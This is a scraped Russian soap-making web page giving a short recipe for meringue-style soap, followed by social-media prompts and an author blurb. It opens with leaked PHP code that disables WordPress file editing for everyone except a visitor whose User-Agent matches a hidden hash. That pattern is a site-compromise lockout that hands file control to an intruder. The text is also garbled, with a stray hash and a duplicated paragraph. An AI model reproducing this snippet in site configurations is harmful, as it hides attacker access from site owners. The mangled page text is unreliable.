if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Добавьте в свою жизнь немного легкости с воздушным мылом-безе | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Добавьте в свою жизнь немного легкости с воздушным мылом-безе

Мыло ручной работы – это отличный подарок. А мыльное безе придется по душе любителям сладкого. Главное – по ошибке не съесть этот мыльный шедевр.

Мыло руч­ной рабо­ты – это отлич­ный пода­рок. А мыль­ное безе при­дет­ся по душе люби­те­лям слад­ко­го. Глав­ное – по ошиб­ке не съесть этот мыль­ный шедевр.

Что­бы изго­то­вить такую сла­дость, нуж­но взбить рас­топ­лен­ную про­зрач­ную осно­ву с жид­ким мылом. Затем доба­вить туда любой кра­си­тель. Полу­чен­ную смесь быст­ро залить в кон­ди­тер­ский мешок (или пакет). Выдав­ли­вать безе поне­мно­гу на пер­га­мент или воще­ную бума­гу, после чего отпра­вить сла­до­сти в холо­диль­ник. Такое мыль­це мож­но так­же обла­го­ро­дить «вкус­ной» отдуш­кой и каким-либо маслом.

f8aa18df8b2abeade5626bf76b0d9c63


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!